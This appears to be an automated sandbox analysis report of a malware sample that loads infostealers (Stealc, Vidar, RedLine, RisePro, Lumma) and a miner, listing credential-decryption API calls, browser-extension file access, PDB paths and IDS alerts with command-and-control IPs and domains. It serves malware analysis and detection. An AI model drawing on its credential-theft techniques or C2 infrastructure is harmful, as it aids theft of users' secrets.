Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: E6UHNR--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	22_2_00409BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	22_2_00418940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	22_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	22_2_00407280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	22_2_00409B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C3A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	22_2_69C3A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C60180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	22_2_69C60180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C343B0 PK11_PubEncryptPKCS1,PR_SetError,	22_2_69C343B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	22_2_69C825B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C344C0 PK11_PubEncrypt,	22_2_69C344C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C34440 PK11_PrivDecrypt,	22_2_69C34440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C04420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	22_2_69C04420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	22_2_69C5A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C1E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	22_2_69C1E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C3A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	22_2_69C3A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C18670 PK11_ExportEncryptedPrivKeyInfo,	22_2_69C18670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C39840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	22_2_69C39840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C33850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	22_2_69C33850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5DA40 SEC_PKCS7ContentIsEncrypted,	22_2_69C5DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C17D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	22_2_69C17D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	22_2_69C5BD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C57C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	22_2_69C57C00

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: FileApp.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.76.21.98:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.6:53024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:53035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53045 version: TLS 1.2

Source: FileApp.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdbI source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: premium_gitrep.pdbx source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.PDB source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdb source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: PE.pdb source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: adsbrowser.pdb(D source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: \??\C:\Windows\exe\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BotClient.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: adsbrowser.pdb source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: HP.o<C:\Windows\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2563660175.00000000012F9000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Code function: 14_2_004062EB FindFirstFileW,FindClose,	14_2_004062EB
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Code function: 14_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	14_2_00406CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	22_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	22_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	22_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	22_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	22_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	22_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	22_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	22_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	22_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	22_2_004133C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.6:49713 -> 62.133.61.172:80
Source: Network traffic	Suricata IDS: 2054710 - Severity 1 - ET MALWARE PrivateLoader CnC Response : 62.133.61.172:80 -> 192.168.2.6:49713
Source: Network traffic	Suricata IDS: 2054711 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (POST) : 192.168.2.6:49713 -> 62.133.61.172:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:53029 -> 147.45.47.36:30035
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:53029 -> 147.45.47.36:30035
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.6:53026
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.6:53026
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 147.45.47.36:30035 -> 192.168.2.6:53029
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2046266 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Token) : 77.105.164.24:50505 -> 192.168.2.6:53031
Source: Network traffic	Suricata IDS: 2046269 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Activity) : 192.168.2.6:53031 -> 77.105.164.24:50505
Source: Network traffic	Suricata IDS: 2049060 - Severity 1 - ET MALWARE RisePro TCP Heartbeat Packet : 192.168.2.6:53031 -> 77.105.164.24:50505
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 147.45.47.36:30035 -> 192.168.2.6:53029
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:56825 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:63594 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.6:56028 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.6:58373 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055492 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (stamppreewntnq .shop) : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:54987 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:50145 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:53043 -> 147.45.68.138:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53043
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53043
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:51216 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:56102 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53053 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:53054 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:53058 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53055
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53059
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53055
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53059
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53053 -> 172.67.146.35:443
